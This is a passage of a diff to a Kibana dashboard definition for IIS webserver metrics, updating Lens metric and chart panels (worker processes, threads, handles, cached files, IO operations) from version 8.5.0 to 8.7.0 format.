"0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", + "layerType": "data", + "maxAccessor": "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", + 
"metricAccessor": "b1337d24-b9ec-486a-b473-0bd61f9a9676", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b": { - "columnOrder": [ - "b1337d24-b9ec-486a-b473-0bd61f9a9676", - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0", - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" - ], - "columns": { - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.process.worker_process_count))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.process.worker_process_count))", - "isFormulaBroken": false - }, - "references": [ - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" - ], - "scale": "ratio" - }, - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.worker_process_count: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.worker_process_count" - }, - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", - "operationType": "overall_max", - "references": [ - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0" - ], - "scale": "ratio" - }, - "b1337d24-b9ec-486a-b473-0bd61f9a9676": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": 
"kuery", - "query": "iis.webserver.process.worker_process_count: *" - }, - "isBucketed": false, - "label": "Worker Processes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.worker_process_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D33115", - "layerId": "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", - "layerType": "data", - "maxAccessor": "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", - "metricAccessor": "b1337d24-b9ec-486a-b473-0bd61f9a9676", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Worker Process Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", + "w": 10, + "x": 28, + "y": 0 + }, + "panelIndex": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "36bd76ba-75e7-4da3-9b47-1761f2a90360": { + "columnOrder": [ + "5b28c920-82fe-4b46-9cb4-3ded30e1003f", + "2498791c-ea82-4bb4-b12b-0034cb09e964", + "2498791c-ea82-4bb4-b12b-0034cb09e964X0", + "2498791c-ea82-4bb4-b12b-0034cb09e964X1" + ], + "columns": { + "2498791c-ea82-4bb4-b12b-0034cb09e964": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.process.thread_count))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.process.thread_count))", + "isFormulaBroken": false + }, + "references": [ + 
"2498791c-ea82-4bb4-b12b-0034cb09e964X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "d2f639d2-4288-4110-871d-c123e43a8a5f", - "w": 10, - "x": 18, - "y": 0 - }, - "panelIndex": "d2f639d2-4288-4110-871d-c123e43a8a5f", - "title": "Worker Process Count", - "type": "lens", - "version": "8.5.0" + "2498791c-ea82-4bb4-b12b-0034cb09e964X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.thread_count: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.thread_count" + }, + "2498791c-ea82-4bb4-b12b-0034cb09e964X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", + "operationType": "overall_max", + "references": [ + "2498791c-ea82-4bb4-b12b-0034cb09e964X0" + ], + "scale": "ratio" + }, + "5b28c920-82fe-4b46-9cb4-3ded30e1003f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.thread_count: *" + }, + "isBucketed": false, + "label": "Thread Count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.thread_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#16A5A5", + "layerId": "36bd76ba-75e7-4da3-9b47-1761f2a90360", + "layerType": "data", + "maxAccessor": "2498791c-ea82-4bb4-b12b-0034cb09e964", + "metricAccessor": "5b28c920-82fe-4b46-9cb4-3ded30e1003f", + 
"progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "36bd76ba-75e7-4da3-9b47-1761f2a90360": { - "columnOrder": [ - "5b28c920-82fe-4b46-9cb4-3ded30e1003f", - "2498791c-ea82-4bb4-b12b-0034cb09e964", - "2498791c-ea82-4bb4-b12b-0034cb09e964X0", - "2498791c-ea82-4bb4-b12b-0034cb09e964X1" - ], - "columns": { - "2498791c-ea82-4bb4-b12b-0034cb09e964": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.process.thread_count))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.process.thread_count))", - "isFormulaBroken": false - }, - "references": [ - "2498791c-ea82-4bb4-b12b-0034cb09e964X1" - ], - "scale": "ratio" - }, - "2498791c-ea82-4bb4-b12b-0034cb09e964X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.thread_count: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.thread_count" - }, - "2498791c-ea82-4bb4-b12b-0034cb09e964X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", - "operationType": "overall_max", - "references": [ - "2498791c-ea82-4bb4-b12b-0034cb09e964X0" - ], - "scale": "ratio" - }, - "5b28c920-82fe-4b46-9cb4-3ded30e1003f": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.thread_count: *" - }, - "isBucketed": false, - "label": "Thread 
Count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.thread_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#16A5A5", - "layerId": "36bd76ba-75e7-4da3-9b47-1761f2a90360", - "layerType": "data", - "maxAccessor": "2498791c-ea82-4bb4-b12b-0034cb09e964", - "metricAccessor": "5b28c920-82fe-4b46-9cb4-3ded30e1003f", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Thread Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "9acc09af-8176-4625-927d-af97d4b5080b", + "w": 10, + "x": 38, + "y": 0 + }, + "panelIndex": "9acc09af-8176-4625-927d-af97d4b5080b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "3282c038-29da-4266-a759-0329ac8b34c1": { + "columnOrder": [ + "2dd652b7-4f9d-4e4e-8703-a968187ca637", + "1287ef02-3486-46bc-a610-0b84078417c5", + "1287ef02-3486-46bc-a610-0b84078417c5X0", + "1287ef02-3486-46bc-a610-0b84078417c5X1" + ], + "columns": { + "1287ef02-3486-46bc-a610-0b84078417c5": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.process.handle_count))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.process.handle_count))", + "isFormulaBroken": false + }, + "references": [ + "1287ef02-3486-46bc-a610-0b84078417c5X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, 
- "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", - "w": 10, - "x": 28, - "y": 0 - }, - "panelIndex": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", - "title": "Thread Count", - "type": "lens", - "version": "8.5.0" + "1287ef02-3486-46bc-a610-0b84078417c5X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.handle_count: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.handle_count" + }, + "1287ef02-3486-46bc-a610-0b84078417c5X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", + "operationType": "overall_max", + "references": [ + "1287ef02-3486-46bc-a610-0b84078417c5X0" + ], + "scale": "ratio" + }, + "2dd652b7-4f9d-4e4e-8703-a968187ca637": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.handle_count: *" + }, + "isBucketed": false, + "label": "Handle Count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.handle_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#653294", + "layerId": "3282c038-29da-4266-a759-0329ac8b34c1", + "layerType": "data", + "maxAccessor": "1287ef02-3486-46bc-a610-0b84078417c5", + "metricAccessor": "2dd652b7-4f9d-4e4e-8703-a968187ca637", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "3282c038-29da-4266-a759-0329ac8b34c1": { - "columnOrder": [ - "2dd652b7-4f9d-4e4e-8703-a968187ca637", - "1287ef02-3486-46bc-a610-0b84078417c5", - "1287ef02-3486-46bc-a610-0b84078417c5X0", - "1287ef02-3486-46bc-a610-0b84078417c5X1" - ], - "columns": { - "1287ef02-3486-46bc-a610-0b84078417c5": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.process.handle_count))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.process.handle_count))", - "isFormulaBroken": false - }, - "references": [ - "1287ef02-3486-46bc-a610-0b84078417c5X1" - ], - "scale": "ratio" - }, - "1287ef02-3486-46bc-a610-0b84078417c5X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.handle_count: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.handle_count" - }, - "1287ef02-3486-46bc-a610-0b84078417c5X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", - "operationType": "overall_max", - "references": [ - "1287ef02-3486-46bc-a610-0b84078417c5X0" - ], - "scale": "ratio" - }, - "2dd652b7-4f9d-4e4e-8703-a968187ca637": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.handle_count: *" - }, - "isBucketed": false, - "label": "Handle Count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
"iis.webserver.process.handle_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#653294", - "layerId": "3282c038-29da-4266-a759-0329ac8b34c1", - "layerType": "data", - "maxAccessor": "1287ef02-3486-46bc-a610-0b84078417c5", - "metricAccessor": "2dd652b7-4f9d-4e4e-8703-a968187ca637", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Handle Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "de5da809-a2ac-4388-9040-ed6f037c901d", + "w": 5, + "x": 0, + "y": 5 + }, + "panelIndex": "de5da809-a2ac-4388-9040-ed6f037c901d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "092efddb-12b7-4c7e-b10f-37878ddd82e0": { + "columnOrder": [ + "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", + "5e1bef76-dfce-440d-a4a7-ec293ad19426", + "5e1bef76-dfce-440d-a4a7-ec293ad19426X0", + "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" + ], + "columns": { + "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_files_cached: *" + }, + "isBucketed": false, + "label": "Current Files Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_files_cached" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": 
"9acc09af-8176-4625-927d-af97d4b5080b", - "w": 10, - "x": 38, - "y": 0 - }, - "panelIndex": "9acc09af-8176-4625-927d-af97d4b5080b", - "title": "Handle Count", - "type": "lens", - "version": "8.5.0" + "5e1bef76-dfce-440d-a4a7-ec293ad19426": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.current_files_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.current_files_cached))", + "isFormulaBroken": false + }, + "references": [ + "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" + ], + "scale": "ratio" + }, + "5e1bef76-dfce-440d-a4a7-ec293ad19426X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_files_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_files_cached" + }, + "5e1bef76-dfce-440d-a4a7-ec293ad19426X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", + "operationType": "overall_max", + "references": [ + "5e1bef76-dfce-440d-a4a7-ec293ad19426X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#15D3A2", + "layerId": "092efddb-12b7-4c7e-b10f-37878ddd82e0", + "layerType": "data", + "maxAccessor": "5e1bef76-dfce-440d-a4a7-ec293ad19426", + "metricAccessor": "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "092efddb-12b7-4c7e-b10f-37878ddd82e0": { - "columnOrder": [ - "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", - "5e1bef76-dfce-440d-a4a7-ec293ad19426", - "5e1bef76-dfce-440d-a4a7-ec293ad19426X0", - "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" - ], - "columns": { - "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_files_cached: *" - }, - "isBucketed": false, - "label": "Current Files Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_files_cached" - }, - "5e1bef76-dfce-440d-a4a7-ec293ad19426": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.current_files_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.current_files_cached))", - "isFormulaBroken": false - }, - "references": [ - "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" - ], - "scale": "ratio" - }, - "5e1bef76-dfce-440d-a4a7-ec293ad19426X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_files_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_files_cached" - }, - "5e1bef76-dfce-440d-a4a7-ec293ad19426X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", - "operationType": "overall_max", - 
"references": [ - "5e1bef76-dfce-440d-a4a7-ec293ad19426X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#15D3A2", - "layerId": "092efddb-12b7-4c7e-b10f-37878ddd82e0", - "layerType": "data", - "maxAccessor": "5e1bef76-dfce-440d-a4a7-ec293ad19426", - "metricAccessor": "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Files Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "a64ca567-3295-4753-9a22-2ce5dcb16a40", + "w": 5, + "x": 5, + "y": 5 + }, + "panelIndex": "a64ca567-3295-4753-9a22-2ce5dcb16a40", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d": { + "columnOrder": [ + "56173f88-30d9-4259-abb2-b52fdd659aa9", + "0728015c-910d-4ef9-bae8-e87778f2c5a0", + "0728015c-910d-4ef9-bae8-e87778f2c5a0X0", + "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" + ], + "columns": { + "0728015c-910d-4ef9-bae8-e87778f2c5a0": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.total_files_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.total_files_cached))", + "isFormulaBroken": false + }, + "references": [ + "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": 
{ - "h": 9, - "i": "de5da809-a2ac-4388-9040-ed6f037c901d", - "w": 5, - "x": 0, - "y": 5 - }, - "panelIndex": "de5da809-a2ac-4388-9040-ed6f037c901d", - "title": "Current Files Cached", - "type": "lens", - "version": "8.5.0" + "0728015c-910d-4ef9-bae8-e87778f2c5a0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_files_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_files_cached" + }, + "0728015c-910d-4ef9-bae8-e87778f2c5a0X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", + "operationType": "overall_max", + "references": [ + "0728015c-910d-4ef9-bae8-e87778f2c5a0X0" + ], + "scale": "ratio" + }, + "56173f88-30d9-4259-abb2-b52fdd659aa9": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_files_cached: *" + }, + "isBucketed": false, + "label": "Total Files Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_files_cached" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#15A2D3", + "layerId": "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", + "layerType": "data", + "maxAccessor": "0728015c-910d-4ef9-bae8-e87778f2c5a0", + "metricAccessor": "56173f88-30d9-4259-abb2-b52fdd659aa9", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d": { - "columnOrder": [ - "56173f88-30d9-4259-abb2-b52fdd659aa9", - "0728015c-910d-4ef9-bae8-e87778f2c5a0", - "0728015c-910d-4ef9-bae8-e87778f2c5a0X0", - "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" - ], - "columns": { - "0728015c-910d-4ef9-bae8-e87778f2c5a0": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.total_files_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.total_files_cached))", - "isFormulaBroken": false - }, - "references": [ - "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" - ], - "scale": "ratio" - }, - "0728015c-910d-4ef9-bae8-e87778f2c5a0X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_files_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_files_cached" - }, - "0728015c-910d-4ef9-bae8-e87778f2c5a0X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", - "operationType": "overall_max", - "references": [ - "0728015c-910d-4ef9-bae8-e87778f2c5a0X0" - ], - "scale": "ratio" - }, - "56173f88-30d9-4259-abb2-b52fdd659aa9": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_files_cached: *" - }, - "isBucketed": false, - "label": "Total Files Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": 
"ratio", - "sourceField": "iis.webserver.cache.total_files_cached" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#15A2D3", - "layerId": "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", - "layerType": "data", - "maxAccessor": "0728015c-910d-4ef9-bae8-e87778f2c5a0", - "metricAccessor": "56173f88-30d9-4259-abb2-b52fdd659aa9", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Files Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "c805cba0-cce2-4c3a-8626-492958427932", + "w": 38, + "x": 10, + "y": 11 + }, + "panelIndex": "c805cba0-cce2-4c3a-8626-492958427932", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "53550c84-3d37-4bfe-9059-5cc839edce4c": { + "columnOrder": [ + "90c65dab-0b07-48bf-8c3a-c8d64037f66b", + "b602b162-ab23-4b52-87b7-48580e710e04" + ], + "columns": { + "90c65dab-0b07-48bf-8c3a-c8d64037f66b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "b602b162-ab23-4b52-87b7-48580e710e04": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Write Operations/s", + 
"operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.io_write_operations_per_sec" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": true + "d281f47d-1e36-4ab1-be8c-5f6d11e38479": { + "columnOrder": [ + "6fc74322-ff38-45fd-94bd-04e683578e20", + "ca48fc8d-6ced-44a4-ada8-78faa367cba4" + ], + "columns": { + "6fc74322-ff38-45fd-94bd-04e683578e20": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ca48fc8d-6ced-44a4-ada8-78faa367cba4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Read Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.io_read_operations_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 9, - "i": "a64ca567-3295-4753-9a22-2ce5dcb16a40", - "w": 5, - "x": 5, - "y": 5 + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "a64ca567-3295-4753-9a22-2ce5dcb16a40", - "title": "Total Files Cached", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", - 
